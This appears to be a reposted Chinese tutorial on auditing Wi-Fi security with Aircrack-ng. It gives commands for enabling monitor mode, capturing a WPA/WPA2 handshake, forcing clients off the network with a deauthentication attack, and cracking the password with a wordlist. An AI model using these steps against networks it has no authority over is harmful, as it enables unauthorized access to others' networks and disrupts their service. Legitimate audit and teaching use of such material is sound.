zoukankan      html  css  js  c++  java
  • 使用Aircrack-ng进行无线安全审计

    设置监听模式

    激活网卡

    ifconfig wlan0 up

    结束占用网络接口的进程

    airmon-ng check kill
    

    开启监听模式

    airmon-ng start wlan0

    查看网卡是否成功开启了监听模式

    iwconfig
    

    Mode状态为Monitor为开启成功,Managed为不成功。

    捕获数据包

    此处须填写监听模式的接口,一般为wlan0mon。

    airodump-ng wlan0mon
    

    按Ctrl+C可停止扫描。 

    airodump-ng -t WPA2 wlan0mon                   #仅捕获WPA2加密方式的数据包
    airodump-ng --bssid 00:25:00:FF:94:73 wlan0mon #指定捕获BSSID的包
    airodump-ng -N Tech-For-Test wlan0mon          #指定捕获ESSID的包
    airodump-ng -c 6 wlan0mon                      #捕获信道为6的包
    

    保存捕获的数据包

    airodump-ng -w packet wlan0mon #将捕获的数据包保存到名为packet的文件中
    

    读取数据包

    airodump-ng -r xxx.pcap        #读取名为xxx.pcap的数据包
    

    这里我们使用以下命令:

    airodump-ng -c 11 -w AirCrk --bssid F0:DB:F8:0C:0B:28 wlan0mon

                           频道号  写入AirCrk文件

    等待右上角出现WPA handshake关键字时说明成功获得到了包含WPA密码的4次握手数据报文,此时可使用aireplay注入。

    若没有看到这个提示,可以增加Deauth的发送数量。

    其他导致无法获取握手报文的原因(摘自Longas的《Linux-BT4黑客手册》):

    1.可能该无线网卡对这些无线工具的支持性不好,比如很多笔记本自带的无线网卡支持性就不好。

    2.无线接入点自身问题,有的AP在遭受攻击后会短时间内失去响应,需重启后等待片刻才能恢复正常工作状态。

    注入数据包

    目的是强制客户端重新连接,从而获取WPA/WPA2握手数据包。(需airodump-ng处于运行状态)

    重新打开一个终端。

    -0表示Deauth攻击模式 5表示发送次数  

    aireplay-ng -0 1 -a A4:2B:8C:7D:98:7D-c F0:DB:F8:0C:0B:28 wlan0mon #使用Deauth攻击模式 破解WPA/WPA2包。

                                  BSSID mac地址             STATION mac地址 

    最后使用加载字典对cap数据包进行破解。

    aircrack-ng -w dic.txt -b F0:DB:F8:0C:0B:28 log-01.cap
    

    如果字典比较大,跑起来可能需要很久,这个过程是很考验RP的,破解成功后会出现下图界面:

    作者:AirCrk
    原文地址:http://www.cnblogs.com/AirCrk/articles/5652589.html

  • 相关阅读:
    51nod 1031+斐波那契和杨辉三角的一些基础知识
    51nod 1297
    萌新二叉树学习笔记
    HDU3415【单调队列】
    萌新瞎讲网络流之最大流【不定期更新理解篇】
    萌新浅谈单调队列
    51nod 1021【区间DP】
    51nod 1278【贪心】
    51nod 1413
    51nod1181【素数筛】
  • 原文地址:https://www.cnblogs.com/AirCrk/p/5652589.html
Copyright © 2011-2022 走看看